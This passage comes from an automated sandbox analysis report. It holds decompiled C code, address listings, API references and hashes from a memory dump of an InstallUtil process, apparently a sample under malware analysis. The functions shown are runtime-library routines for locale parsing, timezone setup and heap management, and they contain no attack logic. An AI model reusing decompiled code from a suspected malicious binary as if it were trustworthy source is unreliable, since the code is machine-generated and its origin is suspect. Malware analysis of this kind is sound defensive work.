												__eflags =  *_t257;
												if( *_t257 == 0) {
													L66:
													_t370 = 0;
													_t258 = 0;
												} else {
													_t422 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t422 -  *((intOrPtr*)(_t374 + 2));
													_v458 = _t422;
													_t421 = _v452;
													if(_t422 !=  *((intOrPtr*)(_t374 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t374 = _t374 + 4;
														__eflags = _v458;
														if(_v458 != 0) {
															continue;
														} else {
															goto L66;
														}
													}
												}
												L68:
												__eflags = _t258;
												if(_t258 == 0) {
													_t359 = _t359 + 1;
													__eflags = _t359;
													goto L73;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t446);
													_push(_t428);
													L83();
													_t421 = _v452;
													_t474 = _t474 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t370 = 0;
														_t256 = 0;
														_v456 = 0;
													} else {
														_t359 = _t359 + 1;
														_t370 = 0;
														goto L73;
													}
												}
												goto L74;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t370 = 0;
											__eflags = 0;
											goto L68;
										}
										L74:
										_t446 = _t446 + 1;
										_t421 = _t421 + 0x10;
										_v452 = _t421;
										__eflags = _t446 - 5;
									} while (_t446 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t359;
										goto L77;
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t444 + 2) - 0x43;
								if( *(_t444 + 2) != 0x43) {
									goto L58;
								} else {
									__eflags =  *((short*)(_t444 + 4)) - 0x5f;
									if( *((short*)(_t444 + 4)) != 0x5f) {
										goto L58;
									} else {
										while(1) {
											_t261 = E0044CE58(_t444, 0x458548);
											_t361 = _t261;
											_v472 = _t361;
											_pop(_t376);
											__eflags = _t361;
											if(_t361 == 0) {
												break;
											}
											_t263 = _t261 - _t444;
											__eflags = _t263;
											_v456 = _t263 >> 1;
											if(_t263 == 0) {
												break;
											} else {
												_t265 = 0x3b;
												__eflags =  *_t361 - _t265;
												if( *_t361 == _t265) {
													break;
												} else {
													_t431 = _v456;
													_t362 = 0x45840c;
													_v460 = 1;
													do {
														_t266 = E0044CE1E( *_t362, _t444, _t431);
														_t472 = _t472 + 0xc;
														__eflags = _t266;
														if(_t266 != 0) {
															goto L45;
														} else {
															_t377 =  *_t362;
															_t420 = _t377 + 2;
															do {
																_t334 =  *_t377;
																_t377 = _t377 + 2;
																__eflags = _t334 - _v468;
															} while (_t334 != _v468);
															_t376 = _t377 - _t420 >> 1;
															__eflags = _t431 - _t377 - _t420 >> 1;
															if(_t431 != _t377 - _t420 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v460 = _v460 + 1;
														_t362 = _t362 + 0xc;
														__eflags = _t362 - 0x45843c;
													} while (_t362 <= 0x45843c);
													_t359 = _v472 + 2;
													_t267 = E0044CDCE(_t376, _t359, ";");
													_t428 = _v464;
													_t447 = _t267;
													_pop(_t380);
													__eflags = _t447;
													if(_t447 != 0) {
														L48:
														__eflags = _v460 - 5;
														if(_v460 > 5) {
															_t268 = _v452;
															goto L54;
														} else {
															_push(_t447);
															_t270 = E0044BE3A(_t380,  &_v276, 0x83, _t359);
															_t475 = _t472 + 0x10;
															__eflags = _t270;
															if(_t270 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00438659();
																asm("int3");
																_push(_t463);
																_t465 = _t475;
																_t273 =  *0x46c00c; // 0xe1ce05e9
																_v556 = _t273 ^ _t465;
																_push(_t359);
																_t364 = _v540;
																_push(_t447);
																_push(_t428);
																_t432 = _v544;
																_v1292 = _t364;
																_v1276 = E00444255(_t364, _t380, _t420) + 0x278;
																_push( &_v1256);
																_t280 = E00440983(_t364, _t420, _t432, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
																_t477 = _t475 - 0x2e4 + 0x18;
																__eflags = _t280;
																if(_t280 != 0) {
																	_t101 = _t364 + 2; // 0x6
																	_t450 = _t101 << 4;
																	__eflags = _t450;
																	_t281 =  &_v280;
																	_v724 = _t450;
																	_t381 =  *((intOrPtr*)(_t450 + _t432));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t381;
																		_t452 = _v724;
																		if( *_t281 !=  *_t381) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L91:
																			_t282 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t381 + 2));
																			_v718 = _t459;
																			_t452 = _v724;
																			if(_t459 !=  *((intOrPtr*)(_t381 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t381 = _t381 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L91;
																				}
																			}
																		}
																		L93:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t382 =  &_v280;
																			_t424 = _t382 + 2;
																			do {
																				_t283 =  *_t382;
																				_t382 = _t382 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t382 - _t424 >> 1) + 1;
																			_t286 = E004421F7(_t382 - _t424 >> 1, 4 + ((_t382 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L84;
																			} else {
																				_v732 =  *((intOrPtr*)(_t452 + _t432));
																				_t125 = _t364 * 4; // 0xcbd5
																				_v744 =  *((intOrPtr*)(_t432 + _t125 + 0xa0));
																				_t128 = _t432 + 8; // 0x8b56ff8b
																				_v748 =  *_t128;
																				_t391 =  &_v280;
																				_v720 = _t286 + 4;
																				_t290 = E00443BA1(_t286 + 4, _v728,  &_v280);
																				_t479 = _t477 + 0xc;
																				__eflags = _t290;
																				if(_t290 != 0) {
																					_t291 = _v712;
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					_push(_t291);
																					E00438659();
																					asm("int3");
																					_t293 =  *0x46d508; // 0x0
																					return _t293;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t452 + _t432)) = _v720;
																					if(_v280 != 0x43) {
																						L102:
																						_t296 = E00440690(_t364, _t391, _t432,  &_v708);
																						_t393 = _v712;
																						 *(_t432 + 0xa0 + _t364 * 4) = _t296;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L102;
																						} else {
																							_t393 = _v712;
																							 *(_t432 + 0xa0 + _t364 * 4) = _t393;
																						}
																					}
																					__eflags = _t364 - 2;
																					if(_t364 != 2) {
																						__eflags = _t364 - 1;
																						if(_t364 != 1) {
																							__eflags = _t364 - 5;
																							if(_t364 == 5) {
																								 *((intOrPtr*)(_t432 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t432 + 0x10)) = _v716;
																						}
																					} else {
																						_t457 = _v736;
																						_t425 = _t393;
																						_t403 = _t457;
																						 *(_t432 + 8) = _v716;
																						_v720 = _t457;
																						_v728 = _t457[8];
																						_v716 = _t457[9];
																						while(1) {
																							_t154 = _t432 + 8; // 0x8b56ff8b
																							__eflags =  *_t154 -  *_t403;
																							if( *_t154 ==  *_t403) {
																								break;
																							}
																							_t458 = _v720;
																							_t425 = _t425 + 1;
																							_t328 =  *_t403;
																							 *_t458 = _v728;
																							_v716 = _t403[1];
																							_t403 = _t458 + 8;
																							 *((intOrPtr*)(_t458 + 4)) = _v716;
																							_t364 = _v752;
																							_t457 = _v736;
																							_v728 = _t328;
																							_v720 = _t403;
																							__eflags = _t425 - 5;
																							if(_t425 < 5) {
																								continue;
																							} else {
																							}
																							L110:
																							__eflags = _t425 - 5;
																							if(__eflags == 0) {
																								_t178 = _t432 + 8; // 0x8b56ff8b
																								_t319 = E0044CE9D(_t364, _t425, _t432, _t457, __eflags, _v712, 1, 0x4584c8, 0x7f,  &_v536,  *_t178, 1);
																								_t479 = _t479 + 0x1c;
																								__eflags = _t319;
																								_t320 = _v712;
																								if(_t319 == 0) {
																									_t457[1] = _t320;
																								} else {
																									do {
																										 *(_t465 + _t320 * 2 - 0x20c) =  *(_t465 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t323 = E004338FA( &_v536,  *0x46c160, 0xfe);
																									_t479 = _t479 + 0xc;
																									__eflags = _t323;
																									_t457[1] = 0 | _t323 == 0x00000000;
																								}
																								_t193 = _t432 + 8; // 0x8b56ff8b
																								 *_t457 =  *_t193;
																							}
																							 *(_t432 + 0x18) = _t457[1];
																							goto L121;
																						}
																						__eflags = _t425;
																						if(_t425 != 0) {
																							 *_t457 =  *(_t457 + _t425 * 8);
																							_t457[1] =  *(_t457 + 4 + _t425 * 8);
																							 *(_t457 + _t425 * 8) = _v728;
																							 *(_t457 + 4 + _t425 * 8) = _v716;
																						}
																						goto L110;
																					}
																					L121:
																					_t297 = _t364 * 0xc;
																					_t200 = _t297 + 0x458408; // 0x40df7b
																					 *0x4544b0(_t432);
																					_t299 =  *((intOrPtr*)( *_t200))();
																					_t396 = _v732;
																					__eflags = _t299;
																					if(_t299 == 0) {
																						__eflags = _t396 - 0x46c298;
																						if(_t396 != 0x46c298) {
																							_t456 = _t364 + _t364;
																							__eflags = _t456;
																							asm("lock xadd [eax], ecx");
																							if(_t456 != 0) {
																								goto L126;
																							} else {
																								_t218 = _t456 * 8; // 0x30ff068b
																								E004427C2( *((intOrPtr*)(_t432 + _t218 + 0x28)));
																								_t221 = _t456 * 8; // 0x30ff0c46
																								E004427C2( *((intOrPtr*)(_t432 + _t221 + 0x24)));
																								_t224 = _t364 * 4; // 0xcbd5
																								E004427C2( *((intOrPtr*)(_t432 + _t224 + 0xa0)));
																								_t399 = _v712;
																								 *((intOrPtr*)(_v724 + _t432)) = _t399;
																								 *(_t432 + 0xa0 + _t364 * 4) = _t399;
																							}
																						}
																						_t397 = _v740;
																						 *_t397 = 1;
																						 *((intOrPtr*)(_t432 + 0x28 + (_t364 + _t364) * 8)) = _t397;
																					} else {
																						 *(_v724 + _t432) = _t396;
																						_t205 = _t364 * 4; // 0xcbd5
																						E004427C2( *((intOrPtr*)(_t432 + _t205 + 0xa0)));
																						 *(_t432 + 0xa0 + _t364 * 4) = _v744;
																						E004427C2(_v740);
																						 *(_t432 + 8) = _v748;
																						goto L84;
																					}
																					goto L85;
																				}
																			}
																		} else {
																			goto L85;
																		}
																		goto L130;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L93;
																} else {
																	L84:
																	__eflags = 0;
																	L85:
																	__eflags = _v16 ^ _t465;
																	return E004318FB(_v16 ^ _t465);
																}
															} else {
																_t330 = _t447 + _t447;
																__eflags = _t330 - 0x106;
																if(_t330 >= 0x106) {
																	E00431A2F();
																	goto L82;
																} else {
																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
																	_t332 =  &_v276;
																	_push(_t332);
																	_push(_v460);
																	_push(_t428);
																	L83();
																	_t472 = _t475 + 0xc;
																	__eflags = _t332;
																	_t268 = _v452;
																	if(_t332 != 0) {
																		_t268 = _t268 + 1;
																		_v452 = _t268;
																	}
																	L54:
																	_t444 = _t359 + _t447 * 2;
																	_t370 = 0;
																	__eflags =  *_t444;
																	if( *_t444 == 0) {
																		L56:
																		__eflags = _t268;
																		L77:
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																		}
																		goto L80;
																	} else {
																		_t444 = _t444 + 2;
																		__eflags =  *_t444;
																		if( *_t444 != 0) {
																			continue;
																		} else {
																			goto L56;
																		}
																	}
																}
															}
														}
													} else {
														_t333 = 0x3b;
														__eflags =  *_t359 - _t333;
														if( *_t359 != _t333) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L130;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t444;
						if(_t444 != 0) {
							_push(_t444);
							_push(_t249);
							_push(_t428);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t463;
						return E004318FB(_v12 ^ _t463);
					}
				}
				L130:
			}

0x00440dbb
0x00440dbe
0x00440dc0
0x00440dc3
0x00440dc4
0x00440dcd
0x00440dd5
0x00440dd7
0x00440dd9
0x00440ddc
0x00440ef5
0x00440efa
0x00440de2
0x00440de2
0x00440de3
0x00440de3
0x00440de6
0x00440de9
0x00440deb
0x00440dee
0x00440dee
0x00440df1
0x00440df3
0x00440df6
0x00440dfb
0x00440e09
0x00440e13
0x00440e16
0x00440e19
0x00440e19
0x00440e24
0x00440e29
0x00440e2e
0x00000000
0x00440e34
0x00440e37
0x00440e37
0x00440e3a
0x00440e3c
0x00440e3f
0x00440e3f
0x00440e3f
0x00440e41
0x00440e41
0x00440e41
0x00440e47
0x00000000
0x00000000
0x00440e4c
0x00440e63
0x00440e63
0x00440e4e
0x00440e4e
0x00440e56
0x00000000
0x00440e58
0x00440e58
0x00440e5b
0x00440e61
0x00000000
0x00000000
0x00000000
0x00000000
0x00440e61
0x00440e56
0x00440e6c
0x00440e71
0x00440e73
0x00440e78
0x00440e7b
0x00440e7e
0x00440e81
0x00440e84
0x00440e86
0x00440e8b
0x00440e95
0x00440e9d
0x00440ea5
0x00000000
0x00440eab
0x00440eaf
0x00440efc
0x00440f02
0x00440f05
0x00440f08
0x00440f0a
0x00440f0e
0x00440f12
0x00440f14
0x00440f17
0x00440f1c
0x00440f12
0x00440f1d
0x00440f20
0x00440f22
0x00440f24
0x00440f28
0x00440f29
0x00440f2b
0x00440f2e
0x00440f33
0x00440f29
0x00440f36
0x00440f39
0x00440f3c
0x00440f3f
0x00440f42
0x00440f42
0x00440eb1
0x00440eb1
0x00440eb4
0x00440eb7
0x00440eb9
0x00440ebd
0x00440ec1
0x00440ec3
0x00440ec6
0x00440ecb
0x00440ec1
0x00440ecc
0x00440ed1
0x00440ed3
0x00440ed8
0x00440eda
0x00440edd
0x00440ee2
0x00440ed8
0x00440ee3
0x00440ee7
0x00440ee7
0x00440eea
0x00440eee
0x00440ef1
0x00440ef1
0x00000000
0x00440ef4
0x00000000
0x00440ea5
0x00440e67
0x00440e69
0x00440e69
0x00000000
0x00440e69
0x00440f49
0x00440f4a
0x00440f4b
0x00440f4c
0x00440f4d
0x00440f4e
0x00440f53
0x00440f56
0x00440f57
0x00440f59
0x00440f5f
0x00440f66
0x00440f69
0x00440f6c
0x00440f6d
0x00440f6e
0x00440f71
0x00440f72
0x00440f75
0x00440f7b
0x00440f7d
0x00440fa2
0x00440fac
0x00440fb2
0x00440fb4
0x00440fba
0x00440fbc
0x0044120f
0x00441210
0x00000000
0x00440fc2
0x00440fc2
0x00440fc6
0x0044112d
0x0044112d
0x00441144
0x00441149
0x0044114c
0x0044114e
0x00441154
0x00441154
0x00441156
0x00441156
0x00441159
0x0044115b
0x00441161
0x00441161
0x00441163
0x004411ea
0x004411ea
0x00441169
0x00441169
0x0044116b
0x00441171
0x00441174
0x00441177
0x0044117d
0x00000000
0x00000000
0x0044117f
0x00441183
0x004411ac
0x004411ac
0x004411ae
0x00441185
0x00441185
0x00441189
0x0044118d
0x00441194
0x0044119a
0x00000000
0x0044119c
0x0044119c
0x0044119f
0x004411a2
0x004411aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004411aa
0x0044119a
0x004411b9
0x004411b9
0x004411bb
0x004411e9
0x004411e9
0x00000000
0x004411bd
0x004411bd
0x004411c3
0x004411c4
0x004411c5
0x004411c6
0x004411cb
0x004411d1
0x004411d4
0x004411d6
0x004411dd
0x004411df
0x004411e1
0x004411d8
0x004411d8
0x004411d9
0x00000000
0x004411d9
0x004411d6
0x00000000
0x004411bb
0x004411b2
0x004411b4
0x004411b7
0x004411b7
0x00000000
0x004411b7
0x004411f0
0x004411f0
0x004411f1
0x004411f4
0x004411fa
0x004411fa
0x00441203
0x00441205
0x00000000
0x00441207
0x00441207
0x00000000
0x00441207
0x00441205
0x00000000
0x00440fcc
0x00440fcc
0x00440fd1
0x00000000
0x00440fd7
0x00440fd7
0x00440fdc
0x00000000
0x00440fe2
0x00440fe2
0x00440fe8
0x00440fed
0x00440fef
0x00440ff6
0x00440ff7
0x00440ff9
0x00000000
0x00000000
0x00440fff
0x00440fff
0x00441003
0x00441009
0x00000000
0x0044100f
0x00441011
0x00441012
0x00441015
0x00000000
0x0044101b
0x0044101b
0x00441021
0x00441026
0x00441030
0x00441034
0x00441039
0x0044103c
0x0044103e
0x00000000
0x00441040
0x00441040
0x00441042
0x00441045
0x00441045
0x00441048
0x0044104b
0x0044104b
0x00441056
0x00441058
0x0044105a
0x00000000
0x00000000
0x0044105a
0x00000000
0x0044105c
0x0044105c
0x00441062
0x00441065
0x00441065
0x00441073
0x0044107c
0x00441081
0x00441087
0x0044108a
0x0044108b
0x0044108d
0x0044109b
0x0044109b
0x004410a2
0x00441103
0x00000000
0x004410a4
0x004410a4
0x004410b2
0x004410b7
0x004410ba
0x004410bc
0x0044122c
0x0044122e
0x0044122f
0x00441230
0x00441231
0x00441232
0x00441233
0x00441238
0x0044123b
0x0044123c
0x00441244
0x0044124b
0x0044124e
0x0044124f
0x00441252
0x00441256
0x00441257
0x0044125a
0x0044126a
0x00441276
0x0044128d
0x00441292
0x00441295
0x00441297
0x004412ac
0x004412af
0x004412af
0x004412b2
0x004412b8
0x004412c1
0x004412c3
0x004412c6
0x004412cd
0x004412d0
0x004412d6
0x00000000
0x00000000
0x004412d8
0x004412dc
0x00441305
0x00441305
0x004412de
0x004412de
0x004412e2
0x004412e6
0x004412ed
0x004412f3
0x00000000
0x004412f5
0x004412f5
0x004412f8
0x004412fb
0x00441303
0x00000000
0x00000000
0x00000000
0x00000000
0x00441303
0x004412f3
0x00441312
0x00441312
0x00441314
0x0044131a
0x00441320
0x00441323
0x00441323
0x00441326
0x00441329
0x00441329
0x00441339
0x00441347
0x0044134c
0x00441353
0x00441355
0x00000000
0x0044135b
0x00441361
0x00441367
0x0044136e
0x00441374
0x00441377
0x0044137d
0x0044138a
0x00441391
0x00441396
0x00441399
0x0044139b
0x004415f4
0x004415fa
0x004415fb
0x004415fc
0x004415fd
0x004415fe
0x004415ff
0x00441604
0x00441605
0x0044160a
0x004413a1
0x004413a1
0x004413af
0x004413b2
0x004413cd
0x004413d4
0x004413da
0x004413e0
0x004413b4
0x004413b4
0x004413bc
0x00000000
0x004413be
0x004413be
0x004413c4
0x004413c4
0x004413bc
0x004413e7
0x004413ea
0x00441507
0x0044150a
0x00441517
0x0044151a
0x00441522
0x00441522
0x0044150c
0x00441512
0x00441512
0x004413f0
0x004413f0
0x004413f6
0x004413fe
0x00441400
0x00441403
0x0044140c
0x00441415
0x0044141b
0x0044141b
0x0044141e
0x00441420
0x00000000
0x00000000
0x00441422
0x00441428
0x00441429
0x00441434
0x0044143c
0x00441444
0x00441447
0x0044144a
0x00441450
0x00441456
0x0044145c
0x00441462
0x00441465
0x00000000
0x00000000
0x00441467
0x0044148c
0x0044148c
0x0044148f
0x00441493
0x004414ac
0x004414b1
0x004414b4
0x004414b6
0x004414bc
0x004414f7
0x004414be
0x004414be
0x004414c3
0x004414cb
0x004414cc
0x004414cc
0x004414e3
0x004414ea
0x004414ed
0x004414f2
0x004414f2
0x004414fa
0x004414fd
0x004414fd
0x00441502
0x00000000
0x00441502
0x00441469
0x0044146b
0x00441470
0x00441476
0x0044147f
0x00441488
0x00441488
0x00000000
0x0044146b
0x00441525
0x00441525
0x00441529
0x00441531
0x00441537
0x0044153a
0x00441540
0x00441542
0x00441582
0x00441588
0x0044158f
0x0044158f
0x00441595
0x00441599
0x00000000
0x0044159b
0x0044159b
0x0044159f
0x004415a4
0x004415a8
0x004415ad
0x004415b4
0x004415c2
0x004415c8
0x004415cb
0x004415cb
0x00441599
0x004415da
0x004415e2
0x004415eb
0x00441544
0x0044154a
0x0044154d
0x00441554
0x00441566
0x0044156d
0x0044157a
0x00000000
0x0044157a
0x00000000
0x00441542
0x0044139b
0x00441316
0x00000000
0x00441316
0x00000000
0x00441314
0x0044130d
0x0044130f
0x0044130f
0x00000000
0x00441299
0x00441299
0x00441299
0x0044129b
0x004412a0
0x004412ab
0x004412ab
0x004410c2
0x004410c2
0x004410c5
0x004410ca
0x00441227
0x00000000
0x004410d0
0x004410d2
0x004410da
0x004410e0
0x004410e1
0x004410e7
0x004410e8
0x004410ed
0x004410f0
0x004410f2
0x004410f8
0x004410fa
0x004410fb
0x004410fb
0x00441109
0x00441109
0x0044110c
0x0044110e
0x00441111
0x0044111f
0x0044111f
0x00441209
0x00441209
0x00000000
0x0044120b
0x0044120b
0x00000000
0x00441113
0x00441113
0x00441116
0x00441119
0x00000000
0x00000000
0x00000000
0x00000000
0x00441119
0x00441111
0x004410ca
0x004410bc
0x0044108f
0x00441091
0x00441092
0x00441095
0x00000000
0x00000000
0x00000000
0x00000000
0x00441095
0x0044108d
0x00441015
0x00000000
0x00441009
0x00000000
0x00441126
0x00440fdc
0x00440fd1
0x00440fc6
0x00440f7f
0x00440f7f
0x00440f81
0x00440f83
0x00440f84
0x00440f85
0x00440f86
0x00440f8b
0x00441216
0x0044121b
0x00441226
0x00441226
0x00440f7d
0x00000000

APIs

Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229

_free.LIBCMT ref: 00440EC6
_free.LIBCMT ref: 00440EDD
_free.LIBCMT ref: 00440EFC
_free.LIBCMT ref: 00440F17
_free.LIBCMT ref: 00440F2E

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 66794e6e5dd866b2328fda1afd2a329169f241d911e3389fe01e4a7f9b4ed555
Instruction ID: 86da635baec41bffebc5b660051239989cb1c6c0fe19470a9d99e2f9f5b67bea
Opcode Fuzzy Hash: 66794e6e5dd866b2328fda1afd2a329169f241d911e3389fe01e4a7f9b4ed555
Instruction Fuzzy Hash: A151D571A00304AFEB20DF6AC881B6A77F4EF54724B10496EEA09D7251EB79D921CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004453A5 Relevance: 7.7, APIs: 5, Instructions: 171
timeCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E004453A5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E00444E0F();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E00444E6D( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00438659();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46c00c; // 0xe1ce05e9
					_v56 = _t38 ^ _t106;
					 *0x46c334 =  *0x46c334 | 0xffffffff;
					 *0x46c328 =  *0x46c328 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x46d748 = 0;
					_t42 = E00438A25(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E004421F7(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E00438A25(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E004427C2(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E004427C2();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E004453A5(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E004451D0(_t77, _t89, _t100, __eflags);
						}
					}
					E004427C2(_t100);
					__eflags = _v12 ^ _t106;
					return E004318FB(_v12 ^ _t106);
				} else {
					_t54 = E00444E15( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E00444E41( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E004427C2( *0x46d740);
							 *0x46d740 = 0;
							 *_t107 = 0x46d750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x46d750 * 0x3c;
								_t87 =  *0x46d7a4; // 0x0
								_push(__edi);
								 *0x46d748 = 1;
								_v8 = _t85;
								_t116 =  *0x46d796; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x46d7ea; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x46d7f8; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E00441DC6(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x46d754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x46d7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E00444E09()) = _v8;
							 *(E00444DFD()) = _v12;
							_t61 = E00444E03();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x004453a5
0x004453b4
0x004453bb
0x004453bf
0x004453c2
0x004453c5
0x004453ca
0x004453cd
0x004454f5
0x004454f5
0x004454f6
0x004454f7
0x004454f8
0x004454f9
0x004454fa
0x004454ff
0x00445503
0x0044550b
0x00445512
0x00445515
0x00445522
0x00445529
0x0044552a
0x0044552c
0x00445531
0x00445540
0x00445547
0x0044554f
0x00445551
0x0044555b
0x0044555e
0x0044556b
0x0044556e
0x00445570
0x00445589
0x00445591
0x00445593
0x00445599
0x0044559e
0x00445595
0x00445595
0x00000000
0x00445595
0x00445572
0x00445572
0x00445573
0x00445573
0x00445573
0x004455a0
0x00445553
0x00445553
0x00445553
0x004455ad
0x004455af
0x004455b1
0x004455b3
0x004455c3
0x004455c3
0x004455b5
0x004455b5
0x004455b8
0x00000000
0x004455ba
0x004455ba
0x004455bb
0x004455c0
0x004455b8
0x004455c9
0x004455d4
0x004455df
0x004453d3
0x004453d7
0x004453dc
0x004453df
0x00000000
0x004453e5
0x004453e9
0x004453ee
0x004453f1
0x00000000
0x004453f7
0x004453fd
0x00445402
0x00445408
0x00445418
0x0044541e
0x00445425
0x0044542b
0x0044542f
0x00445435
0x00445438
0x0044543f
0x00445446
0x00445446
0x00445449
0x00445450
0x00445468
0x00445468
0x0044546b
0x00445452
0x00445452
0x00445459
0x00000000
0x0044545b
0x0044545d
0x00445463
0x00445463
0x00445459
0x00445473
0x0044548f
0x0044549f
0x00445496
0x00445498
0x00445498
0x004454bd
0x004454cf
0x004454c4
0x004454c7
0x004454c7
0x004454bd
0x004454d9
0x004454e3
0x004454e8
0x004454ed
0x004454f4
0x004454f4
0x004453f1
0x004453df

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1E4), ref: 0044540F
WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 00445487
WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004454B4
_free.LIBCMT ref: 004453FD

Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
Part of subcall function 004427C2: GetLastError.KERNEL32(0000000A,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A,0000000A), ref: 004427EA

_free.LIBCMT ref: 004455C9

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0628a2c4b3b77270a5ec950b68e299cac7762db55c065e4df2776b2e1745b1a4
Instruction ID: a9e19d20bde1cbb7ee37f1ab3531c36fedfced3597666ee5dbbc85eb4227c00d
Opcode Fuzzy Hash: 0628a2c4b3b77270a5ec950b68e299cac7762db55c065e4df2776b2e1745b1a4
Instruction Fuzzy Hash: 1951EC71D00615ABEF10DF69DC81AAE77B8EF44315F10026FE45097292EB789D418B5E

